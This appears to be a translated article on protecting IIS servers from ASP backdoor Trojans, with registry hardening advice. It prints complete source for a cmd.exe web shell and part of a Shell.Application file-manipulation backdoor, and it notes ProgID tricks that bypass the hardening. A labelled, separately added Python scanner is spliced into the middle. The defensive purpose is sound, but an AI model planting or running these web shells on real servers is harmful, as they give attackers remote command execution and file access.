Preventing ASP-based Trojan horses on Web servers

Source: Internet
Author: User
With the development of ASP technology, more and more Web sites are built on it, and ASP support can be regarded as a basic function of the IIS server in Windows. At the same time, backdoor Trojans written in ASP are becoming more common and more powerful. Because ASP is a scripting service provided by the server itself, an ASP script Trojan is not caught by anti-virus software, and hackers call it "the backdoor that never gets killed". Its high concealment and the difficulty of removing it pose a serious threat to site security, so preventing and removing ASP Trojans places higher technical demands on network administrators. Below, drawing on personal experience, I discuss prevention methods for two fairly typical ASP Trojans, in the hope that they will be useful to everyone.

The following is the code for the first Trojan:

<title>ASP Shell</title>
<%@ Language=VBScript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' Create the COM objects that we'll be using
Set oScript = Server.CreateObject("WScript.Shell")
Set oScriptNet = Server.CreateObject("WScript.Network")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' Check for a command that we have posted
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
  ' Use a poor man's pipe ... a temp file
  szTempFile = "C:\" & oFileSys.GetTempName()
  Call oScript.Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
  Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Execute command">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
  ' Read the output from our command and remove the temp file
  On Error Resume Next
  Response.Write Server.HTMLEncode(oFile.ReadAll)
  oFile.Close
  Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
Then enter the dir command in the command box and click Execute to view the directory listing. It can run a variety of DOS commands, such as copy, net, netstat and so on.

However, by default it runs with only Guest privileges, that is, the permissions of the IUSR_computername account. Of course, if IUSR_computername is added to the Administrators group, it has administrator privileges. The feature of this Trojan is that it is very convenient to use; it is almost like having a DOS command-line window. However, if the server restricts FSO (and does not allow component uploads), it cannot be used at all. It also cannot be used in virtual hosts added to the server afterwards; it only works in the default Web site, so its scope is relatively narrow.

To see how to guard against it, let's look at its code:

Set oScript = Server.CreateObject("WScript.Shell")
' Creates a WScript.Shell object named oScript, used to execute commands
Set oScriptNet = Server.CreateObject("WScript.Network")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
These three lines create the WScript.Shell, WScript.Network and Scripting.FileSystemObject objects. We can block the WScript.Shell object simply by renaming or deleting its keys in the registry, as shown in the figure below. Note that both the "WScript.Shell" key and the "WScript.Shell.1" key must be renamed or deleted. If we only modify the "WScript.Shell" key, the hacker only needs to change the code as follows:

Set oScript = Server.CreateObject("WScript.Shell.1")
and the backdoor Trojan works again.

As you may have realised, when renaming the "WScript.Shell" and "WScript.Shell.1" keys, the new names must not be easy for hackers to guess. For example, if you rename "WScript.Shell" to "WScript.Shell888", the hacker simply changes the code accordingly:

Set oScript = Server.CreateObject("WScript.Shell888")
and the Trojan program can be executed again. Also note that after changing the registry, the Web service must be restarted for the settings to take effect.
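Renaming registry keys only helps if the renamed ProgID is not guessable, so an administrator also wants a way to find ASP pages that instantiate these objects at all. The following scanner is an added example, not part of the article; it flags the ProgIDs used by the two backdoors discussed here (including a renamed "WScript.Shell..." variant and "Shell.Application"), and raises the severity when request input is passed to a command or path call. The sample ASP sources are constructed for the test.

```python
import re
from pathlib import Path

# Constructed sample files (not real site content) that mirror the backdoors
# discussed in the article, plus a benign database page.
SAMPLES = {
    "cmd.asp": '''<%@ Language=VBScript %>
<% Set oScript = Server.CreateObject("WScript.Shell.1")
szCMD = Request.Form(".CMD")
Call oScript.Run("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) %>''',
    "dir.asp": '''<% szCMD = Request.Form("text")
Set Shell = Server.CreateObject("Shell.Application")
Set fod1 = Shell.NameSpace(szCMD) %>''',
    "news.asp": '''<% Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "SELECT title FROM news", conn %>''',
}

# ProgIDs whose instantiation from an ASP page deserves review. The WScript.Shell
# pattern also matches the ".1" version-independent ProgID and a renamed ProgID
# that keeps the prefix (the article's "WScript.Shell888" case).
DANGEROUS_PROGIDS = re.compile(
    r'CreateObject\s*\(\s*"(WScript\.Shell[\w.]*|Shell\.Application'
    r'|Scripting\.FileSystemObject)"', re.IGNORECASE)
# Untrusted request input feeding a command or path call is what turns a
# legitimate use of these objects into a backdoor.
REQUEST_INPUT = re.compile(r'Request\.(Form|QueryString)\s*\(', re.IGNORECASE)
SINK_CALL = re.compile(r'\.(Run|Exec|NameSpace)\s*\(', re.IGNORECASE)


def score_source(src):
    """Return (list of matched ProgIDs, severity) for one ASP source text."""
    findings = [m.group(1) for m in DANGEROUS_PROGIDS.finditer(src)]
    if not findings:
        return [], "clean"
    if REQUEST_INPUT.search(src) and SINK_CALL.search(src):
        return findings, "high"
    return findings, "review"


def scan_tree(root):
    """Scan every .asp/.asa file under root; map relative path -> (findings, severity)."""
    results = {}
    for p in Path(root).rglob("*"):
        if p.suffix.lower() in (".asp", ".asa"):
            results[str(p.relative_to(root))] = score_source(p.read_text(errors="ignore"))
    return results


def scan_samples():
    """Run the scanner over the constructed samples above."""
    return {name: score_source(src) for name, src in SAMPLES.items()}
```

Against a real site, call scan_tree with the Web root (for example the default wwwroot) and review every "high" hit before deciding whether it is legitimate.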

Next, let's look at the code of the second ASP backdoor Trojan:

<% Response.Write "<font size=6 color=red>Only one operation can be performed at a time</font>" %>
<% Response.Write Now() %><br>The physical path where the program resides:
<% Response.Write Request.ServerVariables("APPL_PHYSICAL_PATH") %>
<title>ASP Shell.Application Backdoor</title>
<body>
<form action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=text value="<%= szCMD %>"> Enter the directory you want to browse<br>
<input type=text name=text1 value="<%= szCMD1 %>">
Copy
<input type=text name=text2 value="<%= szCMD2 %>"><br>
<input type=text name=text3 value="<%= szCMD3 %>">
Move
<input type=text name=text4 value="<%= szCMD4 %>"><br>
Path: <input type=text name=text5 value="<%= szCMD5 %>">
Program: <input type=text name=text6 value="<%= szCMD6 %>"><br>
<input type=submit name=sb value="Send command">
</form>
</body>
<%
szCMD = Request.Form("text")    ' directory browsing
If (szCMD <> "") Then
  Set Shell = Server.CreateObject("Shell.Application")    ' create a Shell object
  Set fod1 = Shell.NameSpace(szCMD)
  Set fodItems = fod1.Items
  For Each co In fodItems
    Response.Write "<font color=red>" & co.Path & "-----" & co.Size & "</font><br>"
  Next
End If
%>
<%
szCMD1 = Request.Form("text1")    ' directory copy; cannot copy a single file
szCMD2 = Request.Form("text2")
If szCMD1 <> "" And szCMD2 <> "" Then
  Set Shell1 = Server.CreateObject("Shell.Application")    ' create a Shell object
  Set fod1 = Shell1.NameSpace(szCMD2)
  For i = Len(szCMD1) To 1 Step -1
    If Mid(szCMD1, i, 1) = "\" Then
      path = Left(szCMD1, i - 1)
      Exit For
    End If
  Next
  If Len(path) = 2 Then path = path & "\"
  path2 = Right(szCMD1, Len(szCMD1) - i)
  Set fod2 = Shell1.NameSpace(path)
  Set fodItem = fod2.ParseName(path2)
  fod1.CopyHere fodItem
  Response.Write "Command completed successfully!"
End If
%>
<%
szCMD3 = Request.Form("text3")    ' directory move
szCMD4 = Request.Form("text4")
If szCMD3 <> "" And szCMD4 <> "" Then
  Set Shell2 = Server.CreateObject("Shell.Application")    ' create a Shell object
  Set fod1 = Shell2.NameSpace(szCMD4)
  For i = Len(szCMD3) To 1 Step -1
    If Mid(szCMD3, i, 1) = "\" Then
      path = Left(szCMD3, i - 1)
      Exit For
    End If
  Next
  If Len(


